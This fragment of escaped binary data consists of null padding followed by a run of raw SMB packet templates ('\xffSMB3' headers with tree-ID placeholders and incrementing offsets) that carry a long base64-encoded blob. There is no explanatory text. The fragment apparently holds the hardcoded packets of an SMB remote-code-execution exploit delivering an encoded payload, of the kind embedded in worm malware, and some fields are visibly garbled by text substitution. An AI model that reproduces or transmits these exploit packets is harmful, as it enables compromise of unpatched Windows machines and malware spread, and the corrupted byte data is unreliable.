\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00
\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x
00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\
\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\
\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x83\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\x13\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0#\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd03\\\\x00\\\\x00\\\
\x00\\\\x10GCYPv9lQlkfTV1+aTMUTA0VfaLFyhZq68nTvu6n4pfUV30t9T3TFceGCIx4zTnCQ6S5EjjToosWCxmsltoACAot76+pWFnqcM81lhzddyobk6y7FHmjg68R4aFhZxnGaWE98CXh+wNXxpVQrRWuXsT/exO9Fgq3iJa9YrhsWDVrNddlLhlPZSjd+r7Vb1N42DLbI3TsRC6QTWTCW/u9CZP5OtTLfF5RtGJpRD1w7ATC3MGMEx3ecXVNTq93wT9UOpAdiYhTfRbbGSc3CQYjiZAQeP8+9l+vBMXIVPix9JjXoMpMMNALmtmyPcDktAfCRTNLvWW7/Yr/ZO80z7zqvqhJEEdffn8QkT9e5IWcMjcgV3Gglscqoh41iMXn7hUxI2bGaD2DPEQvGkIM1b/vVlcwQZ5hgqlHRLOCDWdMiIPJOyikWBpc0XExEycIbYGOOlrO1qmrdigNdT1yDJQK0Iv0NrdhqHw2+YH85NqAoCiWHU9cXoGYyaYsAy2tz1FEVsu6ci4R/YbYYSf6bOJo/jNWi/2Cpy6YkwJLe5+AMfbY2EaKnFOiMNs9lrNFzpwbfa7F+K9HYIis1Xtz0A4vXrvJashxkwrYVcchVKnccoXc5Q0mj2emCkx7YyU+DWEhpL705osvQUIkjXM4bmBD/8t5Fa2ByIChQeolaJJ3sDLApsbVoDd+8ZbRGl4964iBIMaHFxSapRYrdlwk29AS3LXPiJBFdQQZXwCOROaz7PZfs086Nt3A8Zq8FKpL6/ALGQDfNi2GdixRe8LNkFWt8ZIy8kzuf9uR6sUivF8FZKwniB9XioG9S0Oe0fHmIG8vPISlcD5hQlRVhnbHFybZAECaqzV97MMKdCi1oIys9aUz7r4H1AqrHiS/FXMyd/EP21A6cM3zGjxyktGoQx0hV3sYvthjyIwQAcUKpgmL+VETTLp8QV8kqV2rrzpqzHgbmgFThT13t6mHf9ELtg8wovtONtS0VBsTCaMSSpDwo5Jo7OayvdM0ZgmSJF3q+QK0avgLv/4CGSWX5CdAY5bVOmiK3URqJGG6MCpTC5MBP8V6IrNOldfEQVMiQQBV0YOvd9UJG/o2DBKOdevpotJOuju2dkTBfStGf0T9V2v763rEQ2Fr8OVR7cGy9e26kP6k1WZJ3F4nBoZc3Oyzavsxmq1paVdYOaRvd0zdjXBCkXrw0oR2vL6QapaV0X7+OBw/jxeTZaj0+joCVdFY5a7G3sJGbn43UA2bwLMyAJSw/LvYI1T7LYM30eQPcikfYEIz63QNgc9c3JX5OEh8sCWMAJlduF/JTWsj4fTSH/aJQDkv0ZJr8cgFe+62RiZI0whnXF1AhBkdoOGbaxwA8BeHxaDX296Z0Tqg8BZXLyw1jS7ZhANKqYFjG/XIT1/pQsPSRS+0CVhiGUu0JPvA6MIy0a6U/E5efdOIadmMs3s2PjxAbyZ6cPh/Ep9RUTZ9z/0ptYl5+tHUwu5z7BEIoB/DKvkutUu2xW6fEClrZY+rdrFD5KQbp0qhYwgEls4ay1j31a+xkRP6TTMx8VvXUutIg1Gmd7i+sXAS6mY98lKee9NvMpJE7OavgZJbxo/kqwdZ5Tj1l7eearPZpscRjg4CUfNauUXzGWhrG2FiNPItH0FOQ7A9f3cPXnSmM0ThoXpQbOQk+0Qw0Ma8AvBS9wk1Xim39g+qnsR0jH1hj+GnpLnT2V696xoLq5JXvFCldRwwZ18KtgDzLK5pKFFVVYGAXHKozu1qDHgC1BDc/qWQDBkwICrYQF/E4CmHlXisGLvXbVSpE7k+htF6ziYfzx3K8oAi5djQQjxEGRioM8tQKTdy0vo9mkOkTyAtghOR6on0tj6O25Inereq0MqAnJ3jaZzHBDdLprgy6fNhShz3yJ7vjt9+LSzusMtag0UiP/Jv2Z8B+Kq1PkLw83Ud8aJ94cXcvXxzlYToxsC968/NAqrPzV7G08t9OVBU1Ay9CagtLbwGPL
FUuhHwmAOAClSxlm+q1S1M+MOh+czc+zrW9Gt6dqAx0c5Jq2VtKjTZvEPaFywH2WMaXbRyDILYrV/l4GnsWyDasWepqTFZDZWTojz2/yys/dI44M27Zgev93L5zZT+37Ds9ChGlw426hFyShgeT5jh1hLu+ejGMM1SQAxxcYQ3Y3E9nzpG/lm//BYUXKmGiBPE7SU3+02DVFvjdbN/56uHkPDr0JIkTiqEc/K5bNXpDJyHNLLfsnpukRFjYPa70OEejhUrAQx5VaRRTe46auY6EEeg7CAKUgURxT3xFV8ER9IrgJ8UJtzAossVSVkevFLW8Gw6x21dzGVir1jWd+HXH/RqxCFojB3fiJ60tdhIQEDYULF4y0ftfHjd62v3dOzBP3cRB5oCh5HGsaVM0dXo8ssm44lutrbnAKidNqTGOV7kMt8EvJ0GmHtyDZcsrtT4/t3O+3smlSCOHOGPecD9WyHiK92g6U5yU6Vdp+2G55TU6O6bn1RKpsDc72Sxo+90XrB+LrX5vDSrEDUR/IysjuJsc4H0TpeaymDzHHgsslBVRtSXS2U7cq0tTBn5CKG9GQXszRDXYMSWv1neD/ck3/WeENtYPgaKe07GCLe3NnD1KEcCuVi4RzmirigWnyXpYe/OHyaE4nj68lfZp0STShgCZ79X1L4U6OI7N4jy9NIHnLKKKBnFg6OnzXUsUTyHSjMoXAjTVzInamuKVdwwhDEBO9Ef9IvNy/4yK7AoGojq4H2qDjCIcTMo5EZMtoLRFWEZSIJmcwfZVl61GrQIsdzeNzQe6gdZHIEyMINUeJ844dqB9GPPp8//yTT66cf8MEL6Jo6wU1jp7LbV4lcAPDpY3v/6Deg+d9Qa3nKUN4dygf5cnq704De/LQ4yD99dWMxFnDNC2pqxR5PwjMSZEu1iS8eTgboOG0EtWkXMSByt6YvBIDqliVbeHCKKWQP0J+x/Fdb05sHN0L50yOqAfnMgSQUGrWyWOj8dg8gkv8cNFwSCYUtsQwyV3wBnWPStAvJ3C6f8Ff1lbEdhh3dqMvjWYyOT+IQ1mB+gy9DW7IQVzhU9zUptVV/8VjL/hXt/KYuLk1jfc2WkjOvz5rw8+RfAqZsGzjt1itVoqxU57HOqksFATmVOVv14hLGdSeH/JRREmcrnd3g6sSoXT9rgK/HbSvCodEBpdhyk7KFGfibeIycvcYUzsjwocNZMiyot6qMjjKIAC6sFjD+f9N6o0wUogWamhbQuQW8SyVyn7zlvs8Xc9zGyZ21D52jGt5gzUNIz5+rzOSitaSQRuFWurwhEdVImJvssG3yEs0/ZSA5RGkwlX0z2Zupbod+1Y4dYgvVmE9JSmet0QqeSEB5gFqS8ae8IzOHGKmgbE3tuPj4Er6htDgOJG0LL7QlL0Mam56IDW2JatOw+UHSFfCa6xtiM1SZjFEqBoSkIZzUh3ufg1/BgaN9ahWjOELM/oLsaLWaWkBNpQcNK8bFtNS7P9EpmbuEXxDfeDD58iEGYXfQcP7VpR2sOT9LwJAIeh6A+jdqwmIG6+oQ8vrHKPDnaYKv3S108w+OEeT45BFYJKwWk+Ra3vRxnKbnRwJQuKEFILgZJSbVEG96tpqBQ4zYjNt/F17ESbH8qo84gKWu6RAAR6Pr+Urtj/81uAJJZHtd0NwBxGdcO566nFCFN3gjt0JoeF2MLmt0/P2yR9B9PGwlFViNLLfIDbqh7n5SJcMx5G6bTAD68SMpC3btqkL79qvdoP/NWLWfNbfFa+bw7GloQ+rmDHBlJQ5hg6IMi+REkxWwPquOqXoXnOtVv0M2mh0JKr6B7BinPYKTvRTwillNISUh2MVr8BfHLz52EoxrxSlctRKrIxVtBd41QsZ8KU/39GgueUuZIf7M0Cfck4pAOAsx5yeog9EtNtz2iXgOo3hyDc0h1Y++cVvvhmuig0qXJzt8Cavc/WYSDuDbVfMVxUwP+KTyjbOaYDJLrfBU0g1+oCQ8LF4i6eZ
n3/9Qah9fJpXBEVUkjQ6zHR9YeOjAqKuR4gqR+88y47cE25XMRehX66tw7i5iYm46aLdkMun6+qqX0sX4VP15G1+tOmBW3Cgi1YWV+NqKly\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0C\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0S\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0c\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0s\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\
x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\x83\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\x93\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xa3\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x105\\\\x00\\\\xd0\\\\xb3\\\\x00\\\\x00\\\\x00\\\\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\\\\x00\\\\x00\\\\x105\\\\xffSMB3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\t\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x0